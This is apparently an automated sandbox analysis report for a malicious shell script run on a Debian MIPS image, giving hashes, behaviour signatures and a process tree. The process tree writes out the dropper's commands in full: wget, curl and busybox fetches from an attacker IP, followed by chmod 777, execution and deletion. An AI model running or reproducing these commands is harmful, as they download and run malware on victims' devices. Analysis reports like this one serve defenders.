Analysis
-
max time kernel
88s -
max time network
91s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/11/2024, 03:07
Static task
static1
Behavioral task
behavioral1
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
-
Size
10KB
-
MD5
00e6a838ebbbb8d44e8bde3072d71948
-
SHA1
18ba68e4dc8af71f08dc42dc68055a295059cee5
-
SHA256
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be
-
SHA512
a8395ad7797c42c32a6f073151b82aea873fa6c842131b0899ee95e667e0038619feddfc236a5b12c834fb6a032f31a0cd79e3f931da05269dda866616ebdc14
-
SSDEEP
192:uTWqEbzElT+8s8V5fmlJRGmGxFNCiOn8s8V5alJRGm6xFNCi/WqEbzcq:unT+8s8V5fmlJRGmrn8s8V5alJRGmf
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 893 chmod 917 chmod 929 chmod 743 chmod 749 chmod 759 chmod 818 chmod 881 chmod 971 chmod 849 chmod 869 chmod 899 chmod 905 chmod 953 chmod 911 chmod 935 chmod 965 chmod 812 chmod 863 chmod 887 chmod 947 chmod 941 chmod 787 chmod 875 chmod 923 chmod 959 chmod 977 chmod 983 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN 744 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T 750 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK 760 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM 788 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk 813 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu 819 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL 851 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD 864 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV 870 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD 876 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP 882 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 888 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik 894 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt 900 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu 906 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL 912 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD 918 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV 924 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD 930 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP 936 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 942 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik 948 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt 954 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN 960 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T 966 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK 972 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM 978 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk 984 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 883 rm 932 wget 934 busybox 937 rm 879 curl 880 busybox 882 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP 878 wget 933 curl 936 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik curl File opened for modification /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK curl File opened for modification /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu curl File opened for modification /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD curl File opened for modification /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu curl File opened for modification /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD curl File opened for modification /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt curl File opened for modification /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt curl File opened for modification /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV curl File opened for modification /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK curl File opened for modification /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T curl File opened for modification /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD curl File opened for modification /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV curl File opened for modification /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik curl File opened for modification /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN curl File opened for modification /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T curl File opened for modification /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM curl File opened for modification /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP curl File opened for modification /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP curl File opened for modification /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk curl File opened for modification /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL curl File opened for modification /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL curl File opened for modification /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 curl File opened for modification /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM curl File opened for modification /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN curl File opened for modification /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk curl File opened for modification /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 curl File opened for modification /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD curl
Processes
-
/tmp/e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh/tmp/e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:720
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:740
-
-
/bin/chmodchmod 777 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN./nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:745
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:746
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:748
-
-
/bin/chmodchmod 777 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T./0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:751
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:752
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:754
-
-
/bin/chmodchmod 777 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK./PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:763
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:764
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:782
-
-
/bin/chmodchmod 777 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM./Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:791
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:793
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:811
-
-
/bin/chmodchmod 777 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk./tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:814
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:815
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:817
-
-
/bin/chmodchmod 777 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu./y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:822
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:843
-
-
/bin/chmodchmod 777 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL./hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:856
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:862
-
-
/bin/chmodchmod 777 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD./RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:865
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:866
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:868
-
-
/bin/chmodchmod 777 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV./OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:871
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:872
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:874
-
-
/bin/chmodchmod 777 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD./TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:877
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP./YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:882
-
-
/bin/rmrm YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:884
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:886
-
-
/bin/chmodchmod 777 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1./JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:890
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:892
-
-
/bin/chmodchmod 777 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik./Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:898
-
-
/bin/chmodchmod 777 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt./BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:904
-
-
/bin/chmodchmod 777 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu./y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:910
-
-
/bin/chmodchmod 777 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL./hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:916
-
-
/bin/chmodchmod 777 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD./RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:919
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:920
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:922
-
-
/bin/chmodchmod 777 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV./OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:925
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:926
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:928
-
-
/bin/chmodchmod 777 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD./TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:931
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:934
-
-
/bin/chmodchmod 777 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP./YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:936
-
-
